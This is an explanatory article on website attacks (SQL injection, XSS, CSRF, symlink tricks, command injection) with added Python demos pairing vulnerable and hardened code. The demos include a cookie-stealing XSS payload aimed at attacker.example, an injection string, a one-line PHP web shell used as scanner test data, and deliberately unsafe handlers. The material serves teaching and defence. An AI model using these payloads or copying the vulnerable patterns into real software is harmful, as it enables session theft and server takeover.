Website attacks: Who is trying to hack your website?
According to SophosLabs (a leading internet security company), around 30,000 websites are newly compromised every day. Nor is it just adult sites and other sites of dubious provenance that are at risk: Microsoft, Facebook and Twitter have all been hacked. Website security is fast becoming a global issue, and the majority of those 30,000 newly infected websites belong to legitimate small businesses.
Types of Hacker
Traditionally, hackers have fallen into a few broad categories. Let's look at those first. Not all hackers are bad:
Computer Security Professionals – the IT security professionals who are paid to test companies' internet security and develop defences. They are in an 'arms race' with the rest of the hackers.
Now the rest. The following tend to be individuals or very small groups:
Hackers – people who break into networks or computers, or who create computer viruses. The motivation is generally to get paid. We have all heard of hackers who become security professionals: 'poacher' turned 'gamekeeper'.
Hackers with scripts (often called 'script kiddies') – they use borrowed programs and scripts to deface websites and attack networks, in an attempt to make a reputation for themselves.
Hackers with a cause ('hacktivists') – the motivation is often religious or political. The hacker may seek to expose some 'injustice' or simply take revenge.
Spy Hackers – individuals hired by large corporations to infiltrate the competition and steal commercially sensitive information. The attack may be external or internal; sometimes the hacker is employed by the target and acts as a mole.
The following tend to be large groups:
Cyber Terrorists – similar to the 'Hackers with a cause' but far more dangerous; they are invariably motivated by religious or political beliefs.
State Sponsored Hackers – Governments around the world use cyber attacks as a weapon.
More recently there has been a rise in cyber crime perpetrated by:
Professional Criminals – individuals or groups who hack into websites purely for fraud or theft of some kind. The Metropolitan Police Service runs the largest cybercrime unit in Europe, dubbed FALCON (Fraud and Linked Crime Online).
How they attack your website
In the past malicious code was distributed mainly via email (remember those warnings about untrustworthy email attachments). Today cyber criminals tend to use automated scanning tools to scour the web for vulnerable websites to infect.
The principal methods include:
DDoS – Distributed Denial of Service, where a server or website is made unavailable to its users. The attacker does not take over the website; instead a large number of compromised machines flood it with traffic until the server is swamped and legitimate visitors cannot be served. The most common form is a flood of HTTP requests for the site's URLs.
Symlink attacks – sometimes described as 'bogus links'. A symbolic link is a file that merely points at another file. If an attacker can plant a symlink on the server (through a file upload, or from a neighbouring account on a shared host), a path the application trusts can be redirected to a file the application never intended to touch: the file at the other end of the link is not the file the application expects. Depending on what the application does with the path, the attacker can read another site's configuration file and its database password, or, if the application writes to the path, corrupt and destroy system files and applications. Either way the attacker can end up in control of the website.
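The following added example (not code from the original article) shows the attack and the check a practitioner would add. A download handler serves files from an `uploads/` directory; the attacker has planted `uploads/avatar.png` as a symlink to a configuration file outside that directory. The vulnerable handler follows the link; the hardened handler resolves the real path, refuses anything outside `uploads/`, and opens the file with `O_NOFOLLOW` so a symlink swapped in at the last moment is rejected too. All paths and file contents are constructed inside a temporary directory for the demo.

```python
"""Symlink attack on a file-serving handler, with the hardened version.
Added example, not from the original article; everything runs inside a
temporary directory created here (constructed data)."""
import os
import tempfile


def setup_demo():
    """Build a fake web root:
      root/config.php          secret the attacker wants (outside uploads/)
      root/uploads/legit.txt   an ordinary upload
      root/uploads/avatar.png  attacker-planted symlink -> ../config.php
    """
    root = tempfile.mkdtemp()
    uploads = os.path.join(root, "uploads")
    os.mkdir(uploads)
    secret = os.path.join(root, "config.php")
    with open(secret, "w") as f:
        f.write("<?php $db_password = 'hunter2'; ?>")
    with open(os.path.join(uploads, "legit.txt"), "w") as f:
        f.write("hello")
    os.symlink(secret, os.path.join(uploads, "avatar.png"))
    return root


def read_upload_vulnerable(root, name):
    """Vulnerable: a '..' check looks like enough, but open() follows the
    symlink and hands back config.php."""
    if ".." in name or name.startswith("/"):
        raise ValueError("bad name")
    path = os.path.join(root, "uploads", name)
    with open(path) as f:
        return f.read()


def read_upload_safe(root, name):
    """Hardened: compare the resolved real path against the real uploads
    directory, then open with O_NOFOLLOW so the final component may not be a
    symlink even if one is swapped in after the check (TOCTOU)."""
    uploads = os.path.realpath(os.path.join(root, "uploads"))
    path = os.path.join(uploads, name)
    real = os.path.realpath(path)
    if os.path.commonpath([uploads, real]) != uploads:
        raise PermissionError("path escapes uploads directory: %s" % name)
    fd = os.open(path, os.O_RDONLY | os.O_NOFOLLOW)
    with os.fdopen(fd) as f:
        return f.read()


if __name__ == "__main__":
    root = setup_demo()
    print("vulnerable handler returned:", read_upload_vulnerable(root, "avatar.png"))
    print("safe handler, ordinary file:", read_upload_safe(root, "legit.txt"))
    try:
        read_upload_safe(root, "avatar.png")
    except PermissionError as e:
        print("safe handler rejected symlink:", e)
```

The `realpath` comparison catches links that point outside the directory; `O_NOFOLLOW` is what stops an attacker who replaces a file with a link between the check and the open.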
Clickjacking – also known as a UI Redress Attack. The attacker loads a page from the target website into an invisible frame and layers it over a decoy page, without the user being aware. The user thinks they are clicking on, or typing into, the page they can see, but the clicks and keystrokes land on the hidden layer, which the attacker has positioned so that they hit a button or field of the attacker's choosing. An example would be a user who believes they are typing a password into a harmless-looking form but is actually typing into an invisible frame controlled by the attacker, or who clicks 'play' on a video and thereby presses 'confirm' on a framed site where they are already logged in. The standard defence is for the website to refuse to be framed, using the X-Frame-Options header or the frame-ancestors directive of Content-Security-Policy.
SQL Injection – allows attackers to read or alter private data such as credit card numbers and other financial data. Injection happens when the application builds a SQL query by pasting untrusted input (a form field, URL parameter or cookie) straight into the query text, so that the input is interpreted as SQL rather than as data. The flaw is in the application code, not in the database or the SQL libraries, and the fix is to use parameterised (prepared) queries so that user input can never change the structure of the query.
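An added example (not code from the original article) of the vulnerable pattern beside the fix, using Python's built-in SQLite driver and a constructed `users` table. The classic `' OR '1'='1` input turns the login query's WHERE clause into something that is true for every row, so the vulnerable version returns every user's card number; the parameterised version treats the same input as a literal string and matches nothing.

```python
"""SQL injection: query built by string formatting vs. a parameterised query.
Added example, not from the original article; in-memory SQLite with
constructed sample rows."""
import sqlite3


def make_db():
    """Constructed sample data (plaintext passwords only to keep the demo short)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT, card TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?, ?)", [
        ("alice", "correct horse", "4111-1111-1111-1111"),
        ("bob", "s3cret", "5500-0000-0000-0004"),
    ])
    return conn


def login_vulnerable(conn, username, password):
    """User input is pasted into the SQL text. A quote in the input closes the
    string literal and the rest of the input becomes SQL."""
    sql = ("SELECT username, card FROM users "
           "WHERE username = '%s' AND password = '%s'" % (username, password))
    return conn.execute(sql).fetchall()


def login_safe(conn, username, password):
    """Parameterised query: values travel separately from the query text, so
    quotes in the input are just characters to be matched."""
    sql = "SELECT username, card FROM users WHERE username = ? AND password = ?"
    return conn.execute(sql, (username, password)).fetchall()


if __name__ == "__main__":
    conn = make_db()
    payload = "' OR '1'='1"
    # Resulting vulnerable query:
    # ... WHERE username = '' OR '1'='1' AND password = '' OR '1'='1'
    # which is true for every row.
    print("vulnerable:", login_vulnerable(conn, payload, payload))
    print("safe:", login_safe(conn, payload, payload))
    print("safe, real credentials:", login_safe(conn, "alice", "correct horse"))
```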
Cross Site Scripting – also known as an XSS attack. The attacker gets their own script included in a page that the website serves to other users, usually because the site echoes user-supplied input (a comment, a search term, a URL parameter) into the page without encoding it. Because the page comes from the legitimate website, the browser trusts the script and runs it with that site's privileges. For example, when a user views the compromised page the script can read their session ID from the cookie and send it to the attacker, who can then hijack the user's current session. If the hijacked user is an administrator, the attacker can take complete control of the website.
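An added example (not code from the original article) of a comment page rendered without and with HTML encoding. The payload is constructed for the demo: it is the cookie-stealing script the paragraph describes, with a made-up attacker host `attacker.example`. The encoded version shows the same text to the reader but contains no live `<script>` tag.

```python
"""Stored XSS: a template that echoes a comment raw, and the encoded version.
Added example, not from the original article. PAGE and PAYLOAD are constructed
for the demo; attacker.example is a placeholder host."""
import html

PAGE = ('<html><body><h1>Comments</h1>'
        '<div class="comment">%s</div></body></html>')

# What an attacker posts as a "comment". In a victim's browser it would send
# the session cookie to the attacker's server.
PAYLOAD = ("<script>new Image().src="
           "'https://attacker.example/steal?c='+document.cookie</script>")


def render_vulnerable(comment):
    """Inserts the comment as-is: any markup in it becomes markup in the page."""
    return PAGE % comment


def render_safe(comment):
    """HTML-encodes the comment: <, >, &, quotes become entities, so the browser
    displays the text and never executes it. Encoding must match the context;
    this is correct for element content and attribute values."""
    return PAGE % html.escape(comment, quote=True)


def contains_live_script(page):
    """Crude check used only to show the difference between the two renderings."""
    return "<script" in page.lower()


if __name__ == "__main__":
    print("vulnerable page runs script:", contains_live_script(render_vulnerable(PAYLOAD)))
    print("encoded page runs script:   ", contains_live_script(render_safe(PAYLOAD)))
    print(render_safe(PAYLOAD))
```

Output encoding is the primary fix; marking the session cookie `HttpOnly` is a second line of defence, because then `document.cookie` cannot read it even if a script does get through.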
Poor User Authentication – attackers take advantage of weak authentication and session management. This covers passwords, key management, session IDs and cookies: weak or reused passwords, session IDs that can be guessed, and session cookies that are sent over plain HTTP or never expire. Once a website's authentication has been compromised the attacker can assume the user's identity.
DNS Cache Poisoning – also referred to as DNS Spoofing. Attackers exploit weaknesses in the domain name system (DNS) to plant a false record in a resolver's cache, so that lookups for your domain return the address of a fake website and traffic is diverted there. The poisoned record does not replicate itself, but the resolver serves it to every client until its time-to-live expires, and other resolvers that forward their queries to the poisoned one cache the bad answer too, so the damage spreads.
Various Scams – these are scams rather than hacks, and occur when users are tricked into revealing private data under false pretences. A classic example is the 'tech support' scam, where the user is contacted by a bogus support engineer and told to download some software to correct a supposed problem.
Cross Site Request Forgery – happens when a user is logged into a website and then visits a page controlled by the attacker, which makes the user's browser send a forged HTTP request to the site (a hidden form that submits itself, for example). The browser attaches the user's session cookie automatically, so the application cannot differentiate the forged request from one the user made deliberately. The attacker never sees the cookie but can act as the user: change their password, make a purchase, transfer money. The forged request only works while the session cookie is valid, which is one reason websites ask you to log out of your account when you have finished. The application-side defence is a secret anti-CSRF token tied to the session that every state-changing request must carry, since the attacker's page cannot read it.
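The following added example (not code from the original article) covers both the session handling from the authentication point above and the CSRF defence just described: an unguessable session ID with a hardened cookie, a CSRF token derived from the session ID with a server secret, and a request handler that accepts the genuine form submission but rejects the forged one even though both carry the session cookie. The requests are modelled as dictionaries constructed for the demo; `SERVER_SECRET` is generated at start-up here and in a real deployment would be a stored secret.

```python
"""Session IDs and anti-CSRF tokens. Added example, not from the original
article. Requests are dicts standing in for HTTP POSTs (constructed data)."""
import hashlib
import hmac
import secrets

# Assumption for the demo: a fresh random secret. In production this is a
# persistent secret kept out of source control.
SERVER_SECRET = secrets.token_bytes(32)


def new_session_id():
    """128 bits from the OS CSPRNG. Not a counter, not a timestamp, not a hash
    of the username: nothing an attacker could predict or enumerate."""
    return secrets.token_urlsafe(16)


def session_cookie_header(session_id):
    """HttpOnly keeps the ID away from page scripts (limits XSS damage),
    Secure keeps it off plain HTTP, SameSite=Lax stops most cross-site
    requests from carrying it in the first place."""
    return "Set-Cookie: session=%s; HttpOnly; Secure; SameSite=Lax; Path=/" % session_id


def csrf_token(session_id):
    """Token bound to the session. The attacker's page cannot read it
    (same-origin policy) and cannot compute it without SERVER_SECRET."""
    return hmac.new(SERVER_SECRET, session_id.encode(), hashlib.sha256).hexdigest()


def handle_transfer(request):
    """Server-side check for a state-changing POST. request = {"cookies": {...}, "form": {...}}."""
    session_id = request["cookies"].get("session")
    if session_id is None:
        return 401, "not logged in"
    expected = csrf_token(session_id)
    supplied = request["form"].get("csrf_token", "")
    if not hmac.compare_digest(expected, supplied):   # constant-time comparison
        return 403, "CSRF token missing or wrong"
    return 200, "transferred %s to %s" % (request["form"]["amount"], request["form"]["to"])


def demo():
    sid = new_session_id()
    # Genuine submission: the site rendered the token into a hidden form field.
    genuine = {"cookies": {"session": sid},
               "form": {"amount": "10", "to": "alice", "csrf_token": csrf_token(sid)}}
    # Forged submission from the attacker's page: the browser attached the
    # cookie by itself, but the attacker has no way to supply the token.
    forged = {"cookies": {"session": sid},
              "form": {"amount": "5000", "to": "mallory"}}
    return handle_transfer(genuine), handle_transfer(forged)


if __name__ == "__main__":
    print(session_cookie_header(new_session_id()))
    print(demo())
```

With `SameSite=Lax` most browsers would not even send the cookie on the forged cross-site POST; the token check is what protects users whose browsers do.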
Remote Code Execution – occurs when a server-side or client-side weakness lets an attacker run code of their choosing on the target machine. Typical causes are untrusted input passed to a shell, an interpreter or a deserialiser, and out-of-date third-party components: libraries, frameworks, CMS plugins and other software modules with known vulnerabilities, especially ones sitting in directories on a server that nobody monitors. Applications built on such components are constantly probed by automated scripts and malware that try known exploits and, once in, run small commands to extract information or install a backdoor.
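An added example (not code from the original article) of the commonest server-side route to code execution: untrusted input reaching a shell. A thumbnail endpoint builds a command from the uploaded file name. `echo` stands in for the real image tool so the demo is harmless, and the attack file name is constructed; a real attacker would append `id`, `curl` to a payload host, or a reverse shell instead of a second `echo`.

```python
"""Command injection leading to remote code execution, and the fix.
Added example, not from the original article. 'echo' stands in for an image
conversion tool; ATTACK is a constructed payload."""
import subprocess


def thumbnail_vulnerable(filename):
    """Builds one shell command string. A file name containing ';' ends the
    intended command and the shell runs whatever follows."""
    cmd = "echo converting %s" % filename
    return subprocess.run(cmd, shell=True, capture_output=True, text=True).stdout


def thumbnail_safe(filename):
    """No shell: an argv list makes the file name a single argument whatever
    characters it contains. Names that look like options or paths are
    rejected as well, since the tool itself might interpret them."""
    if filename.startswith("-") or "/" in filename or "\x00" in filename:
        raise ValueError("rejected file name: %r" % filename)
    return subprocess.run(["echo", "converting", filename],
                          capture_output=True, text=True).stdout


# Constructed attacker-controlled file name.
ATTACK = "photo.jpg; echo INJECTED COMMAND RAN"


if __name__ == "__main__":
    print("vulnerable:\n" + thumbnail_vulnerable(ATTACK))
    print("safe:\n" + thumbnail_safe(ATTACK))
```

The vulnerable version prints two lines, the second produced by the injected command; the safe version prints one line containing the whole file name as text.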
How to Protect your website
Make sure your website is backed up regularly.
Make sure that all the software on your website is fully up to date.
Make sure your website is regularly scanned for any changes, including unexpected changes to file contents or size.
Ensure that your authentication procedures are robust: use strong passwords, and always log out of sessions.
Ensure that sensitive data and traffic is encrypted using TLS (HTTPS), the successor to what is still often called SSL.
Be wary about permitting file uploads to your website.
Above all be vigilant.
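As an added example (not code from the original article) of the "scan for changes" advice above, here is a small file-integrity scanner: it records the size and SHA-256 hash of every file under a web root, and on a later run reports what was added, removed or modified. Hashing matters because an injected line that keeps the file the same length, or a same-size replacement, is invisible to a size-only check. The web root and the "attack" edits are constructed in a temporary directory for the demo.

```python
"""File-integrity scanner for a web root. Added example, not from the original
article; the demo web root and tampering are constructed in a temp directory."""
import hashlib
import os
import tempfile


def snapshot(root):
    """Map relative path -> (size, sha256) for every regular file under root.
    Symlinks are skipped so a planted link cannot make the scanner read
    outside the tree."""
    result = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            full = os.path.join(dirpath, name)
            if os.path.islink(full):
                continue
            h = hashlib.sha256()
            with open(full, "rb") as f:
                for chunk in iter(lambda: f.read(65536), b""):
                    h.update(chunk)
            result[os.path.relpath(full, root)] = (os.path.getsize(full), h.hexdigest())
    return result


def diff_snapshots(baseline, current):
    """Compare two snapshots. A file is 'modified' if size or hash changed."""
    added = sorted(set(current) - set(baseline))
    removed = sorted(set(baseline) - set(current))
    modified = sorted(p for p in baseline if p in current and baseline[p] != current[p])
    return {"added": added, "removed": removed, "modified": modified}


def demo():
    """Constructed web root, then three kinds of tampering:
    a same-length edit, a dropped web shell, and a deleted file."""
    root = tempfile.mkdtemp()
    with open(os.path.join(root, "index.php"), "w") as f:
        f.write("<?php echo 'hello'; ?>\n")
    with open(os.path.join(root, "robots.txt"), "w") as f:
        f.write("User-agent: *\n")
    baseline = snapshot(root)

    # Same length as the original, so a size-only scan would miss it.
    with open(os.path.join(root, "index.php"), "w") as f:
        f.write("<?php echo 'hullo'; ?>\n")
    with open(os.path.join(root, "shell.php"), "w") as f:
        f.write("<?php system($_GET['cmd']); ?>\n")
    os.remove(os.path.join(root, "robots.txt"))

    return diff_snapshots(baseline, snapshot(root))


if __name__ == "__main__":
    print(demo())
```

In practice the baseline is stored off the server (an attacker who can edit files can edit a baseline kept beside them) and the scan runs on a schedule, alerting on any non-empty result.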